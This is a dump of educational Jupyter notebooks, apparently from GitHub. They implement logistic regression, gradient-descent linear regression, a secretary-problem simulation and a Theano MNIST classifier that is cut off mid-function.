text stringlengths 2.5k 6.39M | kind stringclasses 3
values |
|---|---|
<h3 style="text-align: center;"><b>Implementing Binomial Logistic Regression</b></h3>
<h5 style="text-align: center;">This notebook follows this wonderful tutorial by Nikhil Kumar: <a href="https://www.geeksforgeeks.org/understanding-logistic-regression/" target="_blank">https://www.geeksforgeeks.org/understanding-logistic-regression/</a><br></h5>
<h4 style="text-align: center;"><b>Note: most to all the description, code and some text is copied from GeeksToGeeks explanation mostly because its explained very well.</b></h4>
<h4 style="text-align: center;"><b>**To be honest I would recomend just following the GeeksToGeeks Tutorial. This notebook doesn't add anything much to that wonderful tutorial.</b></h4>
<h5 style="text-align: center;">Logistic regression is basically a supervised classification algorithm. In a classification problem, the target variable(or output), y, can take only discrete values for given set of features(or inputs), X.<br><br>Contrary to popular belief, logistic regression IS a regression model. The model builds a regression model to predict the probability that a given data entry belongs to the category numbered as “1”. Just like Linear regression assumes that the data follows a linear function, Logistic regression models the data using the sigmoid function.</h5>
$$ g(z) = \frac{1}{1 + e^{-z}} $$
<h5 style="text-align: center;">Logistic regression becomes a classification technique only when a decision threshold is brought into the picture. The setting of the threshold value is a very important aspect of Logistic regression and is dependent on the classification problem itself.<br>The decision for the value of the threshold value is majorly affected by the values of precision and recall. Ideally, we want both precision and recall to be 1, but this seldom is the case. In case of a Precision-Recall tradeoff we use the following arguments to decide upon the thresold:<ol><li>Low Precision/High Recall: In applications where we want to reduce the number of false negatives without necessarily reducing the number false positives, we choose a decision value which has a low value of Precision or high value of Recall. For example, in a cancer diagnosis application, we do not want any affected patient to be classified as not affected without giving much heed to if the patient is being wrongfully diagnosed with cancer. This is because, the absence of cancer can be detected by further medical diseases but the presence of the disease cannot be detected in an already rejected candidate.</li><li>High Precision/Low Recall: In applications where we want to reduce the number of false positives without necessarily reducing the number false negatives, we choose a decision value which has a high value of Precision or low value of Recall. For example, if we are classifying customers whether they will react positively or negatively to a personalised advertisement, we want to be absolutely sure that the customer will react positively to the advertisemnt because otherwise, a negative reaction can cause a loss potential sales from the customer.</li></ol></h5>
<h5 style="text-align: center;">Based on the number of categories, Logistic regression can be classified as:<ol><li>binomial: target variable can have only 2 possible types: “0” or “1” which may represent “win” vs “loss”, “pass” vs “fail”, “dead” vs “alive”, etc.</li><li>multinomial: target variable can have 3 or more possible types which are not ordered(i.e. types have no quantitative significance) like “disease A” vs “disease B” vs “disease C”.</li><li>ordinal: it deals with target variables with ordered categories. For example, a test score can be categorized as:“very poor”, “poor”, “good”, “very good”. Here, each category can be given a score like 0, 1, 2, 3.</li></ol></h5>
<h5 style="text-align: center;">Let the data be a p x n matrix, where p is the number of feature variables and n is the number of observations</h5>
$$ X = \begin{equation} \begin{bmatrix} 1 & x_{1,1} & \ldots & x_{1,p} \\ 1 & x_{2,1} & \ldots & x_{2,p} \\ \vdots & \vdots & \ddots & \vdots \\ 1 & x_{n,1} & \ldots & x_{n,p} \end{bmatrix} \label{eq:aeqn} \end{equation} $$
<img src="https://latex.codecogs.com/gif.latex?x_i%20%3D%20%5Cbegin%7Bbmatrix%7D%201%5C%5C%20x_%7Bi1%7D%5C%5C%20x_%7Bi2%7D%5C%5C%20.%5C%5C%20.%5C%5C%20x_%7Bip%7D%5C%5C%20%5Cend%7Bbmatrix%7D" alt="">
$$ \text{Then } h(x_i) = \beta_0 + \beta_1x_{i,1} + \beta_2x_{i,2} + \ldots + \beta_px_{i,p}$$
$$ \text{Or can be } h(x_i) = \beta^Tx_i $$
$$ \text{The reason for taking } x_0 = 1 \text{is pretty clear now.
We needed to do a matrix product, but there was no
actual x_0 multiplied to } \beta_0 \text{in original hypothesis formula. So, we defined } x_0 = 1. $$
$$ \text{So } \begin{equation} h(x_i) = g(B^Tx_i) = \frac{1}{1 + e^{-\beta^Tx_i }} \end{equation} $$
<h5 style="text-align: center;">By the equation we know g(z) tends towards 1 as z -> ∞. And g(z) tends towards 0 as z -> -∞. Thus its always bounded between 0 and 1.</h5>
$$ \text{So for 2 labels (0 and 1) for } i^{th} $$
$$ P(y_i = 1|x_i;\beta) = h(x_i) $$
$$ P(y_i = 0|x_i;\beta) = 1 - h(x_i) $$
$$ \text{Or: } P(y_i|x_i;\beta) = (h(x_i))^{y_i}(1 - h(x_i))^{1 - y_i}$$
$$ \text{We also need likelihood which is: nothing but the probability of data(training examples), given a model and specific parameter values(here, }\beta \text{ ). It measures the support provided by the data for each possible value of the } \beta \text{. We obtain it by multiplying all } P(y_i|x_i) \text{ for given }\beta $$
$$ L(\beta) = \prod_{i=1}^{n} P(y_i|x_i;\beta) \text{ or } $$
$$ L(\beta) = \prod_{i=1}^{n} (h(x_i))^{y_i}(1 - h(x_i))^{1 - y_i} $$
$$ \text{For easier calculations: } l(\beta) = \log_{10}(L(\beta)) \text{ or }$$
$$ l(\beta) = \sum_{i=1}^{n}y_i\log_{10}(h(x_i)) + (1 - y_i)\log_{10}(1 - h(x_i)) $$
$$ \text{Cost Function: } J(\beta) = \sum_{i=1}^{n}-y_i\log_{10}(h(x_i)) - (1 - y_i)\log_{10}(1 - h(x_i)) $$
<h5 style="text-align: center;">Using Gradient Descent</h5>
$$ \frac{\partial J(\beta)}{\partial \beta_j} = (h(x) - y)x_j $$
```
"""
All code is from https://www.geeksforgeeks.org/understanding-logistic-regression/ by Nikhil Kumar
"""
import csv
import numpy as np
import matplotlib.pyplot as plt
def loadCSV(filename):
'''
function to load dataset
'''
with open(filename,"r") as csvfile:
lines = csv.reader(csvfile)
dataset = list(lines)
for i in range(len(dataset)):
dataset[i] = [float(x) for x in dataset[i]]
return np.array(dataset)
def normalize(X):
'''
function to normalize feature matrix, X
'''
mins = np.min(X, axis = 0)
maxs = np.max(X, axis = 0)
rng = maxs - mins
norm_X = 1 - ((maxs - X)/rng)
return norm_X
def logistic_func(beta, X):
'''
logistic(sigmoid) function
'''
return 1.0/(1 + np.exp(-np.dot(X, beta.T)))
def log_gradient(beta, X, y):
'''
logistic gradient function
'''
return np.dot((logistic_func(beta, X) - y.reshape(X.shape[0], -1)).T, X)
def cost_func(beta, X, y):
'''
cost function, J
'''
y = np.squeeze(y)
final = -(y * np.log(logistic_func(beta, X))) - ((1 - y) * np.log(1 - logistic_func(beta, X)))
return np.mean(final)
def grad_desc(X, y, beta, lr=.01, converge_change=.001):
'''
gradient descent function
'''
cost = cost_func(beta, X, y)
change_cost = 1
num_iter = 1
while(change_cost > converge_change):
old_cost = cost
beta -= lr * log_gradient(beta, X, y)
cost = cost_func(beta, X, y)
change_cost = old_cost - cost
num_iter += 1
return beta, num_iter
def pred_values(beta, X):
'''
function to predict labels
'''
pred_prob = logistic_func(beta, X)
pred_value = np.where(pred_prob >= .5, 1, 0)
return np.squeeze(pred_value)
def plot_reg(X, y, beta):
'''
function to plot decision boundary
'''
# labelled observations
x_0 = X[np.where(y == 0.0)]
x_1 = X[np.where(y == 1.0)]
# plotting points with diff color for diff label
plt.scatter([x_0[:, 1]], [x_0[:, 2]], c='b', label='y = 0')
plt.scatter([x_1[:, 1]], [x_1[:, 2]], c='r', label='y = 1')
# plotting decision boundary
x1 = np.arange(0, 1, 0.1)
x2 = -(beta[0,0] + beta[0,1]*x1)/beta[0,2]
plt.plot(x1, x2, c='k', label='reg line')
plt.xlabel('x1')
plt.ylabel('x2')
plt.legend()
plt.show()
if __name__=='__main__':
dataset = loadCSV('Data\\binary_data.csv')
# normalizing feature matrix
X = normalize(dataset[:, :-1])
# stacking columns wth all ones in feature matrix
X = np.hstack((np.matrix(np.ones(X.shape[0])).T, X))
# response vector
y = dataset[:, -1]
# initial beta values
beta = np.matrix(np.zeros(X.shape[1]))
# beta values after running gradient descent
beta, num_iter = grad_desc(X, y, beta)
# estimated beta values and number of iterations
print("Estimated regression coefficients:", beta)
print("No. of iterations:", num_iter)
# predicted labels
y_pred = pred_values(beta, X)
# number of correctly predicted labels
print("Correctly predicted labels:", np.sum(y == y_pred))
# plotting regression line
plot_reg(X, y, beta)
from sklearn.linear_model import LogisticRegression
dataset = loadCSV('Data\\binary_data.csv')
X = normalize(dataset[:, :-1])
y = dataset[:, -1]
clf = LogisticRegression(random_state=0).fit(X, y)
print(clf.predict(X[:2, :]))
print(clf.predict_proba(X[:2, :]))
print(clf.score(X, y))
```
<h5 style="text-align: center;">Note: Gradient descent is one of the many way to estimate β Basically, these are more advanced algorithms which can be easily run in Python once you have defined your cost function and your gradients. These algorithms are:<ul><li>BFGS(Broyden–Fletcher–Goldfarb–Shanno algorithm)</li><li>L-BFGS(Like BFGS but uses limited memory)</li><li>Conjugate Gradient<li></ul></h5>
<h5 style="text-align: center;">Advantages/disadvantages of using any one of these algorithms over Gradient descent:</h5><h5 style="text-align: center;"><br>Advantages:<br><ul><li>Don’t need to pick learning rate</li><li>Often run faster (not always the case)</li><li>Can numerically approximate gradient for you (doesn’t always work out well)</li></ul><br>Disadvantages:<ul><li>More complex</li><li>More of a black box unless you learn the specifics</li></ul></h5>
```
"""
This part is from https://www.geeksforgeeks.org/ml-logistic-regression-using-python/
"""
from sklearn.model_selection import train_test_split
xtrain, xtest, ytrain, ytest = train_test_split(
X, y, test_size = 0.25, random_state = 0)
from sklearn.preprocessing import StandardScaler
sc_x = StandardScaler()
xtrain = sc_x.fit_transform(xtrain)
xtest = sc_x.transform(xtest)
from sklearn.linear_model import LogisticRegression
classifier = LogisticRegression(random_state = 0)
classifier.fit(xtrain, ytrain)
y_pred = classifier.predict(xtest)
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(ytest, y_pred)
print ("Confusion Matrix : \n", cm)
from sklearn.metrics import accuracy_score
print ("Accuracy : ", accuracy_score(ytest, y_pred))
from matplotlib.colors import ListedColormap
X_set, y_set = xtest, ytest
X1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() - 1,
stop = X_set[:, 0].max() + 1, step = 0.01),
np.arange(start = X_set[:, 1].min() - 1,
stop = X_set[:, 1].max() + 1, step = 0.01))
plt.contourf(X1, X2, classifier.predict(
np.array([X1.ravel(), X2.ravel()]).T).reshape(
X1.shape), alpha = 0.75, cmap = ListedColormap(('red', 'green')))
plt.xlim(X1.min(), X1.max())
plt.ylim(X2.min(), X2.max())
for i, j in enumerate(np.unique(y_set)):
plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],
c = ListedColormap(('red', 'green'))(i), label = j)
plt.title('Classifier (Test set)')
plt.legend()
plt.show()
```
| github_jupyter |
## This notebook will be focused on using gradient descent to solve simple linear regression and multivariate regression problems
Note: This notebook is for educational purposes as using normal equations would be a superior approach to solving the optimization problem for the datasets that I use in this notebook.
```
import numpy as np
from sklearn.linear_model import LinearRegression # Used for validation
from sklearn import datasets
import random
import matplotlib.pyplot as plt
import pandas as pd
import latex
%matplotlib inline
import warnings
warnings.filterwarnings('ignore')
import time
from sklearn.metrics import mean_squared_error
```
### Initially this notebook will be focused on simple linear regression
```
# Will be using the diabetes dataset with a single predictor.
diabetes = datasets.load_diabetes()
X = diabetes.data[:, np.newaxis, 2]
y = diabetes.target
# Using sklearn's linear regression to determine the ideal output of my implementation
lr = LinearRegression()
lr.fit(X, y)
predictedVals = lr.predict(X)
print("R^2: " + str(lr.score(X, y)))
print("Coefs: " + str(lr.coef_))
print("Intercept: " + str(lr.intercept_))
# Mean squared error to compare to in the future
mean_squared_error(y, predictedVals)
plt.scatter(X, y)
plt.plot(X, predictedVals, color="black")
plt.title("Diabetes Linear Regression")
plt.xlabel("predictor")
plt.ylabel("y value")
plt.show()
```
### In order to implement gradient descent, we must have a cost function with incorporates the weight and bias terms
I will be experimenting with a numpy based implementation and a for loop implementation and seeing if there is any significant time difference in how long it takes for the functions to run. The numpy implementation is over 10x faster.
- N: number of observations, (mx<sub>i</sub> + b) is the prediction
$$MSE = \frac{1}{N}\sum_{i=1}^{n}(y_i - (mx_i + b))^2 $$
```
# Ensuring the shapes of the arrays are correct
# Note: if y is of the wrong shape, it messes up future equations which don't rely on for loops
y0 = y.shape[0]
x0 = X.shape[0]
y.shape = (y0,1)
X.shape = (x0,1)
# Cost function with numpy
def get_cost(X, y, weight, bias):
total_error = np.average((y-(X*weight+bias))**2)
# total_error = np.mean((y-(weight*X+bias))**2)
return total_error
# Cost function with a for loop
def cost_function(X, y, weight, bias):
total = len(X)
total_error = 0.0
for i in range(total):
total_error += (y[i] - (weight*X[i] + bias))**2
return total_error / total
# Testing the cost function implementation with random terms
weight = 3.1245
weight_arr = np.array([weight])
weight_arr.shape = (1,1)
bias = 0.0134
bias_arr = np.array(bias)
bias_arr.shape = (1,1)
start = time.clock()
parallel_cost = get_cost(X,y,weight_arr,bias_arr)
how_long = time.clock() - start
print("Took: ", how_long)
parallel_cost
start = time.clock()
normal_cost = cost_function(X,y,weight,bias)
how_long1 = time.clock() - start
print("Took: ", how_long1)
normal_cost
```
### Creating functions to update the weights and bias terms using gradient descent
Yet again, I will be comparing two implementations of an update_weight function, one using numpy and the other using a for loop to determine if there is a difference in performance. Within the update_weight for loop function, I will also be using the for loop implementation of mse.
$$ f(m,b) = \frac{1}{N}\sum_{i=1}^{n}(y_i-(mx_i-b))^2$$
$$ f^\prime(m,b) = \begin{split} & \frac{df}{dm} = \bigg[\frac{1}{N}\sum-2x_i(y_i-(mx_i+b))\bigg]
\\ & \frac{df}{db} = \bigg[\frac{1}{N}\sum-2(y_i-(mx_i+b))\bigg] \end{split} $$
```
# Updating the weights, without any normalization or optimization, using numpy
def update_weights(X, y, weight, bias, lr=0.01):
df_dm = (1/len(X)) * np.dot((-2*X).T, (y-(weight*X+bias)))
df_db = np.average(-2*(y-(weight*X+bias)))
weight = weight - (lr*df_dm)
bias = bias - (lr*df_db)
return weight,bias
def get_new_weights(X, y, weight, bias, learning_rate=0.01):
weight_deriv = 0
bias_deriv = 0
total = len(X)
for i in range(total):
# -2x(y - (mx + b))
weight_deriv += -2*X[i] * (y[i] - (weight*X[i] + bias))
# -2(y - (mx + b))
bias_deriv += -2*(y[i] - (weight*X[i] + bias))
weight -= (weight_deriv / total) * learning_rate
bias -= (bias_deriv / total) * learning_rate
return weight, bias
# Parameters set for parameter update function testing
# The numpy implementation was around 3x faster
weight = 10.2345
bias = 6.245
start = time.clock()
weight1,bias1 = update_weights(X, y, weight, bias)
took = time.clock() - start
print("Using Numpy: ")
print("Weight: {}, Bias: {}".format(weight1,bias1))
print("Took: ", took)
start = time.clock()
weight2,bias2 = get_new_weights(X, y, weight, bias)
took = time.clock() - start
print("Using For Loop: ")
print("Weight: {}, Bias: {}".format(weight2,bias2))
print("Took: ", took)
```
### Creating a optimization loop which will update the bias and weight parameters
I will be writing two training functions, one using the update_weight function that utilizes numpy and another that uses a simple for loop to update bias and weight terms. The numpy implementation is over 100x faster.
```
# Initializing weight and bias terms
Weight = 0
Bias = 0
# Training using the numpy update_weights function
def train_numpy(X, y, weight, bias, iters, lr=0.01):
cost = []
for i in range(iters):
weight, bias = update_weights(X, y, weight, bias, lr)
a_cost = get_cost(X, y, weight, bias)
cost.append(a_cost)
return cost, weight, bias
# Training using the for loop update_weights function
def train_for(X, y, weight, bias, iters, lr=0.01):
cost = []
for i in range(iters):
weight, bias = get_new_weights(X, y, weight, bias, lr)
a_cost = cost_function(X, y, weight, bias)
cost.append(a_cost)
return cost, weight, bias
# Not using the forloop made optimization around 3x faster
now_time = time.clock()
numpy_cost,numpy_weight,numpy_bias = train_numpy(X, y, Weight, Bias, 7000, 0.1)
took = time.clock() - now_time
print("Took: ", took)
print("Weight: {}, Bias: {}".format(numpy_weight, numpy_bias))
print("End cost: ", numpy_cost[-1])
now_time = time.clock()
for_cost,for_weight, for_bias = train_for(X, y, Weight, Bias, 7000, 0.1)
took = time.clock() - now_time
print("Took: ", took)
print("Weight: {}, Bias: {}".format(for_weight, for_bias))
print("End cost: ", for_cost[-1])
# For plotting cost against time
time_seq = [i for i in range(7000)]
# Although both implementations have similar end cost, the numpy implementation was over 100x faster
plt.figure(figsize=(22,7))
plt.subplot(1, 2, 1)
plt.plot(time_seq, numpy_cost)
plt.title("Cost vs Time Using Numpy")
plt.xlabel("Step Number")
plt.ylabel("Cost")
plt.subplot(1, 2, 2)
plt.plot(time_seq, for_cost)
plt.title("Cost vs Time Using For Loop")
plt.xlabel("Step Number")
plt.ylabel("Cost")
plt.tight_layout()
plt.show()
```
### Now getting the predictions to determine if my model matches the performance of the sklearn linear regression model
Overall, the cost function of my simple linear regression model closely matches that of the sklearn model and as such, I believe that my model is just as effective.
$$ Prediction = (mx_i + b) $$
```
X_list = list(X)
def get_predictions(X, weight, bias):
predictions = []
for i in range(len(X)):
pred = X[i] * weight + bias
predictions.append(pred)
return predictions
predictions = get_predictions(X_list, numpy_weight, numpy_bias)
predictions_arr = np.array(predictions)
# Ensuring predictions is the right shape
predictions_arr.shape = (442,1)
plt.scatter(X, y)
plt.plot(X, predictions_arr, color="black")
plt.title("Diabetes Linear Regression")
plt.xlabel("predictor")
plt.ylabel("y value")
plt.show()
```
## The next section of this notebook will be focused on mulivariate linear regression
Similar principles as earlier will be applied to this section of the notebook. Note that given the speed boost we saw earlier from using numpy and matrix algebra, all my new functions will be implementing these concepts.
```
# Getting a training set with multiple predictor variables
X2 = diabetes.data[:, np.newaxis, 2:5]
# Ensuring that the new X data is of the correct shape
X2.shape = (442,3)
# Getting a value to compare our model to
lr = LinearRegression()
lr.fit(X2, y)
predictedVals = lr.predict(X2)
print("R^2: " + str(lr.score(X2, y)))
print("Coefs: " + str(lr.coef_))
print("Intercept: " + str(lr.intercept_))
# Mean squared error to compare to in the future
mean_squared_error(y, predictedVals)
# Setting the new weights for multivariate regression
weight2 = np.array([[0],
[0],
[0]]) # corresponding with the three variables
bias2 = 0
# Ensuring shapes are correct
assert weight2.shape == (3,1)
assert X2.shape == (442,3)
assert y.shape == (442,1)
```
### Cost function for multivariate regression
$$ MSE = \frac{1}{2N}\sum_{i=1}^{n} (y_i - ((W_1x_1 + W_2x_2 + W_3x_3)+b))^2 $$
$$ \begin{split} & f^\prime(W_1) = -x_1(y-(W_1x_1 + W_2x_2 + W_3x_3+b)) \\
& f^\prime(W_2) = -x_2(y-(W_1x_1 + W_2x_2 + W_3x_3+b)) \\
& f^\prime(W_3) = -x_3(y-(W_1x_1 + W_2x_2 + W_3x_3+b)) \\
& f^\prime(Bias) = -(y-(W_1x_1 + W_2x_2 + W_3x_3+b) \end{split} $$
```
# Multivariate Cost function with numpy
def get_multi_cost(X, y, weight, bias):
total_error = (1/2) * np.average((y-(np.dot(X,weight)+bias))**2)
return total_error
# Testing the cost function
acost = get_multi_cost(X2, y, weight2, bias2)
acost
def update_multi_weights(X, y, weight, bias, lr=0.01):
"""
weight: shape (1,3)
X: shape(442,3)
y: shape(442,1)
output: shape(3,1)
"""
df_dm = (1/len(X)) * np.dot((-X.T), (y-(np.dot(X,weight)+bias)))
df_db = np.average(-(y-(np.dot(X,weight)+bias)))
weight = weight - (lr * df_dm)
bias = bias - (lr * df_db)
return weight,bias
weight2,bias2 = update_multi_weights(X2,y,weight2,0.1)
assert weight2.shape == (3,1)
weight2
# Training loop for multivariate regression
def train_multi(X, y, weight, bias, iters, lr=0.01):
cost = []
for i in range(iters):
weight,bias = update_multi_weights(X,y,weight,bias,lr)
a_cost = get_multi_cost(X, y, weight,bias)
cost.append(a_cost)
return cost, weight,bias
multi_weight = np.array([[0],[0],[0]])
multi_bias = 0
assert multi_weight.shape == (3,1)
cost,multi_weight,multi_bias = train_multi(X2, y, multi_weight, multi_bias, 17000, 0.1)
time_multi = [i for i in range(17000)]
plt.plot(time_multi, cost)
plt.title("Cost vs Time for Multivariate Regression")
plt.xlabel("Step Number")
plt.ylabel("Cost")
plt.show()
# These two cost values should be very similar
print("Final cost:", cost[-1]*2) # note - multiplied by 2 b/c my cost has an additional 1/2 factor
print("Should be around:", mean_squared_error(y, predictedVals))
# This is compared to [[780.74563174 393.19527108 52.90387802]]
multi_weight
# This is compared to [152.13348416]
multi_bias
```
### Finally, I will normalize my input data to see if it affects my cost in any way
$$ x_i = \frac{x_i - mean(X)}{max(X)-min(X)} $$
```
def normalize(X):
for feat in X.T:
mean = np.mean(feat)
rang = np.max(feat) - np.min(feat)
feat = (feat - mean) / rang
return X
# Getting the cost from using normalized data to see if there is any improvement
X2_norm = normalize(X2)
multi_bias = 0
multi_weight = np.array([[0],[0],[0]])
cost,multi_weight,multi_bias = train_multi(X2, y, multi_weight, multi_bias, 17000, 0.1)
# There is an insignificant difference from the normalization
print("Final cost:",cost[-1]*2)
```
| github_jupyter |
```
import numpy as np
import matplotlib.pyplot as plt
```
## Optimal Stopping Problem - [Secretary Problem](https://en.wikipedia.org/wiki/Secretary_problem)
- An administrator who wants to hire the best secretary out of n rankable applicants.
+ The applicants are interviewed one by one
+ Decision (hire/reject) must be made immediately after each interview.
+ Once rejected, an applicant cannot be recalled
- During the interview, the administrator can rank the applicants among all applicants interviewed so far, but is unaware of the quality of yet unseen applicants
- Optimal Stopping - Find the a strategy to hire the most optimal candidate(maximize the probability of selecting the best applicant)
## Solution
#### Observations
- Trade-off between sampling and exploiting
- If the sample size is small -> Not is enough info
- If the sample size is large -> Lot of info but waste many potential candidates
```
Sampling Exploiting
Candidates = x x x x x x o o o o o o o o o o o o o
```
#### Strategy
- n candidates
+ Sampling: sample size = r
+ Interview (r-1) first candidates and reject them all
+ Suppose X is the best candidate in (r-1)
+ Exploiting
+ Interview the rest if found a candidate i better than X -> hire
+ If no candidate better than X -> dont hire -> X is the global optimal candidate
- Find r to maximize the chance of hiring the best candidate
$$
\begin{align*}
P(r) &= \sum_{i=1}^{n}P(\text{applicant i is selected} \cap \text{applicant i is the best}) \\
&= \sum_{i=1}^{n}P(\text{applicant i is selected | applicant i is the best})*P(\text{applicant i is the best}) \\
&= \Bigg[\sum_{i=1}^{r-1}0+\sum_{i=r}^{n}P(\text{the best of the first i-1 applicants is in the first r-1 applicants | applicant i is the best})\Bigg]*\frac{1}{n} \\
&= \Bigg[\sum_{i=1}^{n}\frac{r-1}{i-1}\Bigg]*\frac{1}{n} \\
&= \frac{r-1}{n}\sum_{i=r}^{n}\frac{1}{i-1}
\end{align*}
$$
- If n is small the optimal value of r calculated as above
| n | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |
|:----:|:---:|:---:|:-----:|:-----:|-------|-------|-------|-------|
| r | 1 | 2 | 2 | 3 | 3 | 3 | 4 | 4 |
| P(r) | 0.5 | 0.5 | 0.458 | 0.433 | 0.428 | 0.414 | 0.410 | 0.406 |
- If n -> inf
$$P(x)=x\int_x^1\frac{1}{t}dt=-xln(x)$$
- P(x) -> 1/e ~ 0.368
- Optimal sampling size
```
r = n/e
```
```
# 1/e law of Optimal Strategy
def find_secrectary(candidates):
'''
Input: A list of candidates
Output:
sample_size: n/e ~ 36.8% candidates
idx_sample: index of the best candidate in sample set
idx_hired: index of the optimal hiring candidate (-1 if cant hire)
'''
N = len(candidates)
sample_size = (N/np.exp(1)).round().astype(int)
# Find the best candidate in sample set
idx_sample = 0;
for i in range(sample_size):
if candidates[i] > candidates[idx_sample]:
idx_sample = i
# Find the optimal candidate
idx_optimal = 0;
for i in range(sample_size, N):
if candidates[i] >= candidates[idx_sample]:
return sample_size, idx_sample, i
# Cant choose the optimal candidates
return sample_size, idx_sample, -1
```
## Test
```
def generate_test_set(n, a=30, b=100):
'''Generate n candidates
with normal distribution scores in range [a,b]
'''
# Generate normal distribution test
mu, sigma = a+(b-a)/2, (b-a)/8
candidates = np.random.normal(mu, sigma, n).round().astype(int)
# Shuffle the dataset
np.random.shuffle(candidates)
# Plot histogram
count, bins, ignored = plt.hist(candidates, 100, density=True)
plt.plot(
bins,
1/(sigma * np.sqrt(2 * np.pi)) * np.exp( - (bins - mu)**2 / (2 * sigma**2) ),
linewidth=2, color='r')
plt.show();
return candidates
def test(n, isPrintList=True):
# Hire the optimal secretary
candidates = generate_test_set(n, 40, 100)
sample_size, idx_sample, idx_hired = find_secrectary(candidates)
# Find the global optimal
idx_globals = []
global_optimal = candidates.max()
for i in range(n):
if candidates[i] == global_optimal:
idx_globals.append(i)
# Print the list of candidate
if isPrintList:
print("List of candidates:")
print('\t', end='')
for i,candidate in enumerate(candidates):
print("[{}]{}".format(i, candidate), end=' ')
print('')
# Sampling
print("Sample candidates from [0] to [{}]".format(sample_size-1))
print("Best Sampling rejected candidate: [{}]{}".format(idx_sample, candidates[idx_sample]))
# Make hiring Decision
if idx_hired == -1:
print("Cant hire")
else:
print("Hired candidate: [{}]{}".format(idx_hired, candidates[idx_hired]))
# Global Optimal candidates
print("Global optimal candidates:",end=' ')
for idx in idx_globals:
print("[{}]{}".format(idx, candidates[idx]),end=' ')
test(10)
test(10)
test(20)
test(20)
test(100)
test(100)
test(1000, False)
test(1000, False)
test(int(1e6), False)
test(int(1e6), False)
```
| github_jupyter |
```
import cPickle,gzip,numpy
f=gzip.open('mnist.pkl.gz','rb')
train_set,valid_set,test_set=cPickle.load(f)
f.close()
import theano.tensor as T
import numpy as np
import theano
def shared_dataset(data_xy):
data_x,data_y=data_xy
shared_x=theano.shared(np.array(data_x,dtype=theano.config.floatX))
shared_y=theano.shared(np.array(data_y,dtype=theano.config.floatX))
return shared_x,T.cast(shared_y,'int32')
test_set_x,test_set_y=shared_dataset(test_set)
valid_set_x,valid_set_y=shared_dataset(valid_set)
train_set_x,train_set_y=shared_dataset(train_set)
batch_size=500
class LogisticRegression(object):
def __init__(self,input,n_in,n_out):
self.W=theano.shared(value=numpy.zeros((n_in,n_out),dtype=theano.config.floatX),name='W',borrow=True)
self.b=theano.shared(value=numpy.zeros((n_out,),dtype=theano.config.floatX),name='b',borrow=True)
self.p_y_given_x=T.nnet.softmax(T.dot(input,self.W)+self.b)
self.y_pred=T.argmax(self.p_y_given_x,axis=1)
self.params=[self.W,self.b]
self.input=input
def negative_log_likelihood(self,y):
return -T.mean(T.log(self.p_y_given_x[T.arange(y.shape[0]),y]))
def errors(self,y):
if y.ndim!=self.y_pred.ndim:
raise TypeError('y should have same shape as y.pred',('y',y.type,'y_pred',self.y_pred.type))
if y.dtype.startswith('int'):
return T.mean(T.neq(self.y_pred,y))
else:
raise NotImplementedError()
def load_data(dataset):
''' Loads the dataset
:type dataset: string
:param dataset: the path to the dataset (here MNIST)
'''
#############
# LOAD DATA #
#############
# Download the MNIST dataset if it is not present
data_dir, data_file = os.path.split(dataset)
if data_dir == "" and not os.path.isfile(dataset):
# Check if dataset is in the data directory.
new_path = os.path.join(
os.path.split(__file__)[0],
"..",
"data",
dataset
)
if os.path.isfile(new_path) or data_file == 'mnist.pkl.gz':
dataset = new_path
if (not os.path.isfile(dataset)) and data_file == 'mnist.pkl.gz':
from six.moves import urllib
origin = (
'http://www.iro.umontreal.ca/~lisa/deep/data/mnist/mnist.pkl.gz'
)
print('Downloading data from %s' % origin)
urllib.request.urlretrieve(origin, dataset)
print('... loading data')
# Load the dataset
with gzip.open(dataset, 'rb') as f:
try:
train_set, valid_set, test_set = pickle.load(f, encoding='latin1')
except:
train_set, valid_set, test_set = pickle.load(f)
# train_set, valid_set, test_set format: tuple(input, target)
# input is a numpy.ndarray of 2 dimensions (a matrix)
# where each row corresponds to an example. target is a
# numpy.ndarray of 1 dimension (vector) that has the same length as
# the number of rows in the input. It should give the target
# to the example with the same index in the input.
def shared_dataset(data_xy, borrow=True):
""" Function that loads the dataset into shared variables
The reason we store our dataset in shared variables is to allow
Theano to copy it into the GPU memory (when code is run on GPU).
Since copying data into the GPU is slow, copying a minibatch everytime
is needed (the default behaviour if the data is not in a shared
variable) would lead to a large decrease in performance.
"""
data_x, data_y = data_xy
shared_x = theano.shared(numpy.asarray(data_x,
dtype=theano.config.floatX),
borrow=borrow)
shared_y = theano.shared(numpy.asarray(data_y,
dtype=theano.config.floatX),
borrow=borrow)
# When storing data on the GPU it has to be stored as floats
# therefore we will store the labels as ``floatX`` as well
# (``shared_y`` does exactly that). But during our computations
# we need them as ints (we use labels as index, and if they are
# floats it doesn't make sense) therefore instead of returning
# ``shared_y`` we will have to cast it to int. This little hack
# lets ous get around this issue
return shared_x, T.cast(shared_y, 'int32')
test_set_x, test_set_y = shared_dataset(test_set)
valid_set_x, valid_set_y = shared_dataset(valid_set)
train_set_x, train_set_y = shared_dataset(train_set)
rval = [(train_set_x, train_set_y), (valid_set_x, valid_set_y),
(test_set_x, test_set_y)]
return rval
from theano import function
import timeit
import six.moves.cPickle as pickle
def sgd_optimization_mnist(learning_rate=0.13,n_epochs=1000,dataset='mnist.pkl.gz',batch_size=600):
datasets=load_data(dataset)
train_set_x, train_set_y = datasets[0]
valid_set_x, valid_set_y = datasets[1]
test_set_x, test_set_y = datasets[2]
# compute number of minibatches for training, validation and testing
n_train_batches = train_set_x.get_value(borrow=True).shape[0] // batch_size
n_valid_batches = valid_set_x.get_value(borrow=True).shape[0] // batch_size
n_test_batches = test_set_x.get_value(borrow=True).shape[0] // batch_size
index=T.lscalar()
x=T.matrix('x')
y=T.ivector('y')
classifier = LogisticRegression(input=x,n_in=28*28,n_out=10)
cost=classifier.negative_log_likelihood(y)
test_model=function(inputs=[index],outputs=classifier.errors(y),givens={
x: test_set_x[index*batch_size: (index+1)*batch_size],
y: test_set_y[index*batch_size: (index+1)*batch_size]
})
validate_model = theano.function(
inputs=[index],
outputs=classifier.errors(y),
givens={
x: valid_set_x[index * batch_size: (index + 1) * batch_size],
y: valid_set_y[index * batch_size: (index + 1) * batch_size]
}
)
g_W=T.grad(cost=cost,wrt=classifier.W)
g_b=T.grad(cost=cost,wrt=classifier.b)
updates=[(classifier.W,classifier.W-learning_rate*g_W),
(classifier.b,classifier.b-learning_rate*g_b)]
train_model = theano.function(
inputs=[index],
outputs=cost,
updates=updates,
givens={
